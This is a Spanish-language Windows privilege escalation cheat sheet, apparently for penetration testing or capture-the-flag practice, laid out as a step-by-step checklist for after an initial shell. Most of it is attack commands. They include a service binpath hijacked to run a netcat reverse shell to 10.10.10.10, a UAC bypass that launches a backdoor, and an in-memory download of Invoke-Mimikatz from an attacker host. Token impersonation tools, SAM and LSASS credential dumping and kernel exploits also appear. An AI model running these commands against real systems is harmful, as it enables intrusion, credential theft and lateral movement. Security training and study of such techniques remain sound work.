Guía Maestra Windows PrivEsc
Esta guía unifica técnicas de escalada de privilegios en Windows. Úsala como checklist secuencial tras obtener una shell inicial.
1. Enumeración Automática & Rápida
Antes de nada, sube herramientas y busca vulnerabilidades conocidas.
- WinPEAS:
winPEASx64.exe(La biblia). - Windows Exploit Suggester: 1. En víctima:
systeminfo > sysinfo.txt- En atacante:
./windows-exploit-suggester.py --database 2024-xx-xx-mssb.xls --systeminfo sysinfo.txt
- En atacante:
- Metasploit:
use post/multi/recon/local_exploit_suggester set SESSION <id> run
2. Enumeración Manual Básica
Si no puedes subir herramientas, usa comandos nativos.
Información del Sistema
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
echo %username%
whoami /priv # ¡CRÍTICO! Busca SeImpersonate, SeDebug...
net user <usuario> # Ver grupos del usuario
net localgroup administrators # ¿Quién es admin?
Red y Puertos
ipconfig /all
netstat -ano # Busca puertos en escucha (Listening)
arp -a
route print
Protecciones (AV / Firewall)
sc query windefend # Estado Windows Defender
netsh advfirewall show allprofiles
# Ver exclusiones (si tienes permisos)
Get-MpPreference | select ExclusionPath
3. Abusando de Privilegios (Token Impersonation)
Si whoami /priv muestra alguno de estos privilegios activados, puedes ser NT AUTHORITY\SYSTEM fácilmente.
SeImpersonatePrivilege / SeAssignPrimaryToken
Usa la familia “Potato” o herramientas modernas.
- PrintSpoofer: (Windows 10/Server 2016/2019)
PrintSpoofer.exe -i -c cmd - GodPotato: (Versiones modernas de Windows)
GodPotato.exe -cmd "cmd /c whoami" - Metasploit (Incognito):
load incognito list_tokens -u impersonate_token "NT AUTHORITY\SYSTEM"
SeDebugPrivilege
Permite inyectarse en procesos de SYSTEM.
- Busca un proceso de SYSTEM (ej:
winlogon.exeolsass.exe). - Usa Metasploit
migrate <PID>o inyecta una DLL maliciosa.
4. Kernel Exploits
Si el sistema está desactualizado (mira systeminfo para ver parches KB instalados).
- CVE-2017-0143 (EternalBlue): MS17-010 (Suele ser RCE, pero si ya estás dentro puede escalar).
- CVE-2019-1388 (UAC Bypass Certificate):
- Ejecuta
hhupd.exe(u otro instalador viejo). - Cuando pida UAC, haz clic en “Show information about publisher’s certificate”.
- Clic en el link de “Verisign” -> Abre Internet Explorer como SYSTEM.
- Guardar página como -> cmd.exe.
- Ejecuta
5. Servicios Vulnerables
Unquoted Service Paths
Servicios cuya ruta tiene espacios y NO tiene comillas. Windows intentará ejecutar cada parte de la ruta.
Ruta: C:\Program Files\My Service\service.exe
Ataque: Crea C:\Program.exe o C:\Program Files\My.exe.
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Permisos Débiles en Servicios (Insecure Service Permissions)
Si puedes modificar la configuración de un servicio (ej: daclsvc):
# Cambiar el binario que ejecuta el servicio
sc config <nombre_servicio> binpath= "C:\Temp\nc.exe -e cmd 10.10.10.10 4444"
# Reiniciar servicio
sc stop <nombre_servicio>
sc start <nombre_servicio>
6. Credenciales en Ficheros (Cleartext Passwords)
Winlogon / Autologon
Busca si el admin configuró inicio de sesión automático.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
Ficheros de Instalación Desatendida (Unattended)
Suelen tener la pass de Administrator en base64.
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
# Rutas comunes:
# C:\Windows\Panther\
# C:\Windows\Panther\Unattend\
# C:\Windows\System32\Sysprep\
Busca la etiqueta <AutoLogon><Password><Value>.
SAM & SYSTEM (Si tienes acceso de lectura)
Si puedes leer C:\Windows\System32\config\SAM y SYSTEM, róbalos y crackéalos en tu máquina.
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
7. UAC Bypass
Si eres Administrador pero estás en una shell de integridad media (el UAC te frena).
- Metasploit:
use exploit/windows/local/bypassuac_injection # O busca: search bypassuac - UACMe (Akagi):
# Sube Akagi64.exe # Ejecuta con el método (Key) adecuado para tu versión de Windows Akagi64.exe 23 C:\Temp\backdoor.exe
8. Extracción de Credenciales (Post-Explotación)
Una vez seas Admin/System, roba credenciales para moverte lateralmente.
Mimikatz (La navaja suiza)
# Cargar en memoria sin tocar disco (PowerShell)
IEX (New-Object Net.WebClient).DownloadString('[http://10.10.10.10/Invoke-Mimikatz.ps1](http://10.10.10.10/Invoke-Mimikatz.ps1)'); Invoke-Mimikatz -DumpCreds
# Binario nativo
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
Dumping LSASS
Si Mimikatz es detectado, haz un dump manual de la memoria de lsass.exe y analízalo offline.
- Administrador de tareas -> Click derecho en
lsass.exe-> Crear archivo de volcado. - Llévate el
.dmpa tu Kali. pypykatz lsa minidump lsass.dmp